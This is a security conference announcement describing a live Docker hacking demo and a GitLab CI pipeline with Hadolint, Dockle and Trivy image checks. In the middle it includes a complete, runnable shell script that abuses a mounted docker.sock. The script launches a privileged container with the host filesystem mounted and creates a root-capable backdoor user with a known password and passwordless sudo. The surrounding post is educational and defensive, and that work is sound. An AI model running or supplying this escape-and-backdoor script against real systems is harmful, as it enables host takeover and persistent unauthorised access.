Announcement: Breaking an application in Docker and building a secure pipeline in GitLab

The annual Archdays conference will be held on November 20. There, as part of a live demonstration, Pasha Kann and I will show how an application running in Docker can be hacked and how to build a pipeline with security checks from scratch on GitLab CI.

The attack follows the instructions in the Pentest-In-Docker repository, which we prepared especially for Archdays. There is also a Russian version; you can try to get root on the Linux host right now.

The exploitation chain consists of the following stages:

  • Gaining a shell in the container as the www-data user via an RCE, CVE-2014-6271 (Shellshock);

  • Escalating privileges to root with the FakePip exploit;

  • Connecting to docker.sock and deploying a new Ubuntu container running an SSH service for further access, with the host's / mounted into the container (/:/host) and maximum privileges;

  • Creating the user hidle on the host;

  • Connecting to the host as the new user;

  • Deploying Weave Scope.

This is one scenario for how an attacker could act after finding an RCE in the application together with a mounted docker.sock. Another way out of the container when docker.sock is absent is to exploit a kernel-level vulnerability, for example CVE-2016-5195 (Dirty COW) or CVE-2020-14386… Finally, the easiest way is a publicly reachable, unauthenticated Docker API. In that case the security of the infrastructure depends on how authentication and authorization are configured, on the Docker version, and on the 0-day vulnerabilities you do not know about yet.
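To make the docker.sock stage concrete, here is an added example (not code from the Pentest-In-Docker repository or from the talk) that drives that stage with nothing but curl against the Docker Engine API: create a privileged container with the host's / bind-mounted at /host, start it, and run commands on the host through chroot until there is a user the attacker controls. The same requests work over TCP instead of the unix socket when the Docker API is exposed on the network. Assumptions not from the original post: curl is available in the compromised container, the API version v1.40, the image ubuntu:20.04, the user name/password and the sudoers entry are illustrative, and the exec API stands in for the sshd of the original chain. Use it only against infrastructure you are authorized to test.

```shell
#!/bin/sh
# Added example, not code from the Pentest-In-Docker repository: the docker.sock
# step of the chain above, driven with curl against the Docker Engine API, ending
# with a user the attacker controls on the host. Assumptions not from the post:
# curl is present in the compromised container, the API version is v1.40, the
# image is ubuntu:20.04, the user name/password and the sudoers entry are
# illustrative. Use only against infrastructure you are authorized to test.
set -u

SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"
API="http://localhost/v1.40"
IMAGE_NAME="ubuntu"
IMAGE_TAG="20.04"

# docker_api METHOD PATH [JSON_BODY]: one request to the Engine API over the socket.
docker_api() {
    if [ $# -ge 3 ]; then
        curl -s --unix-socket "$SOCK" -X "$1" -H 'Content-Type: application/json' \
            -d "$3" "$API$2"
    else
        curl -s --unix-socket "$SOCK" -X "$1" "$API$2"
    fi
}

# Body for POST /containers/create: the host's / bind-mounted at /host and
# Privileged=true, i.e. the "/:/host mount and maximum privileges" of the chain.
# The container only sleeps; the exec API replaces the sshd of the original.
create_body() {
    printf '{"Image":"%s:%s","Cmd":["sleep","infinity"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
        "$IMAGE_NAME" "$IMAGE_TAG"
}

# Extract the hex "Id" from responses like {"Id":"4f2c...","Warnings":[]} without
# relying on jq, which a minimal application container usually lacks.
id_from_json() {
    printf '%s' "$1" | sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p'
}

# Body for POST /containers/{id}/exec: chroot into the host's filesystem, so the
# command runs as root on the host. CMD must not contain double quotes.
exec_body() {
    printf '{"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["chroot","/host","/bin/sh","-c","%s"]}' "$1"
}

# host_exec CONTAINER_ID CMD: create an exec instance and start it (Tty=true
# makes the API return plain output instead of multiplexed stream frames).
host_exec() {
    eid=$(id_from_json "$(docker_api POST "/containers/$1/exec" "$(exec_body "$2")")")
    [ -n "$eid" ] || { echo "exec create failed" >&2; return 1; }
    docker_api POST "/exec/$eid/start" '{"Detach":false,"Tty":true}'
}

# escape [SOCKET_PATH]: the whole step. Returns 1 if there is no socket to abuse.
escape() {
    SOCK="${1:-$SOCK}"
    if [ ! -S "$SOCK" ]; then
        echo "no docker socket at $SOCK, this path is closed" >&2
        return 1
    fi
    # Pull the image first; a create against a missing image returns 404.
    docker_api POST "/images/create?fromImage=$IMAGE_NAME&tag=$IMAGE_TAG" >/dev/null
    cid=$(id_from_json "$(docker_api POST /containers/create "$(create_body)")")
    [ -n "$cid" ] || { echo "container create failed" >&2; return 1; }
    docker_api POST "/containers/$cid/start" >/dev/null
    # Same end state as the chain above: user hidle on the host with sudo rights,
    # ready for the "connect to the host as the new user" step.
    host_exec "$cid" "useradd -m -s /bin/bash hidle && echo hidle:hidle | chpasswd"
    host_exec "$cid" "echo 'hidle ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/hidle && chmod 440 /etc/sudoers.d/hidle"
    host_exec "$cid" "id hidle"
}

if [ "${1:-}" = "run" ]; then
    escape
fi
```

Run it as `sh escape.sh run` inside the container once you have root there; if the socket is not mounted, `escape` exits early with status 1, which is exactly the case where the kernel-exploit path mentioned above is the attacker's next option. The defensive takeaway is the same as in the text: whoever can write to docker.sock is root on the host, so the socket must never be mounted into an application container.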

Incidentally, the deployment of Weave Scope here is not accidental: this is exactly how the TeamTNT group gained control over compromised infrastructure.

The image can also be used to trial commercial and open-source container security solutions and see how they detect this malicious activity.

In the second part, we will demonstrate how to create a pipeline with image security checks, using GitLab CI as the example. The pipeline includes Hadolint, Dockle, and Trivy checks, which help prevent unsafe images from being pushed to production. This, in turn, reduces the chances of a successful infrastructure compromise like the one we show in the first part. Instructions for the pipeline and for embedding it can be found in our other repo
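For readers who want to see what such a pipeline looks like before the talk, here is an added example of a minimal .gitlab-ci.yml with the three checks named above. It is not the authors' pipeline from their repository; the job images and tags, the docker:20.10 build job, the GitLab registry variables and the failure thresholds are assumptions chosen for illustration.

```yaml
# Added example, not the authors' pipeline from their repository: a minimal
# .gitlab-ci.yml with the three checks named above. Image tags, the
# docker:20.10 build job and the failure thresholds are assumptions.
stages:
  - lint
  - build
  - scan

variables:
  IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA
  DOCKER_TLS_CERTDIR: "/certs"

# Hadolint lints the Dockerfile before anything is built, so a Dockerfile whose
# last USER is root or that installs unpinned packages never produces an image.
hadolint:
  stage: lint
  image: hadolint/hadolint:latest-debian
  script:
    - hadolint --failure-threshold warning Dockerfile

build:
  stage: build
  image: docker:20.10
  services:
    - docker:20.10-dind
  script:
    - docker login -u "$CI_REGISTRY_USER" -p "$CI_REGISTRY_PASSWORD" "$CI_REGISTRY"
    - docker build -t "$IMAGE" .
    - docker push "$IMAGE"

# Dockle checks the built image against CIS Docker Benchmark items (non-root
# user, no credentials left in layers, and so on) and fails on WARN or worse.
dockle:
  stage: scan
  image:
    name: goodwithtech/dockle:latest
    entrypoint: [""]
  variables:
    DOCKLE_USERNAME: $CI_REGISTRY_USER
    DOCKLE_PASSWORD: $CI_REGISTRY_PASSWORD
  script:
    - dockle --exit-code 1 --exit-level warn "$IMAGE"

# Trivy scans OS packages and application dependencies for known CVEs.
# LOW/MEDIUM findings are reported but do not block; HIGH/CRITICAL fail the job
# and keep the image out of production. An unpatched bash with CVE-2014-6271,
# the entry point of the attack in the first part, would be caught here.
trivy:
  stage: scan
  image:
    name: aquasec/trivy:latest
    entrypoint: [""]
  variables:
    TRIVY_USERNAME: $CI_REGISTRY_USER
    TRIVY_PASSWORD: $CI_REGISTRY_PASSWORD
  script:
    - trivy image --exit-code 0 --severity LOW,MEDIUM --no-progress "$IMAGE"
    - trivy image --exit-code 1 --severity HIGH,CRITICAL --no-progress "$IMAGE"
```

The ordering matters: Hadolint runs before the build so a broken Dockerfile costs nothing, while Dockle and Trivy run against the pushed image so that what is scanned is byte-for-byte what would be deployed. Note that these checks do nothing about a docker.sock mounted at runtime; that is an orchestration-level setting and has to be enforced separately from image scanning.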

Link to the program: https://archdays.ru/speakers/#track-bezopasnost-v-raspredelennyh-sistemah

If you want to come to the conference but have not yet bought a ticket, here is a promo code for a 50% discount: SwordfishSecurityArchdays20

Useful materials

A Methodology for Penetration Testing Docker Systems – a good tutorial for testing applications in Docker

Awesome DevSecOps in Russian – a large selection of materials on DevSecOps in Russian

Awesome Docker Security – Docker security collection

Cloud Security Tools – a selection of tools for Cloud Security

CloudSecDocs – Wiki on Kubernetes, Docker and Cloud Security, including approaches to penetration testing
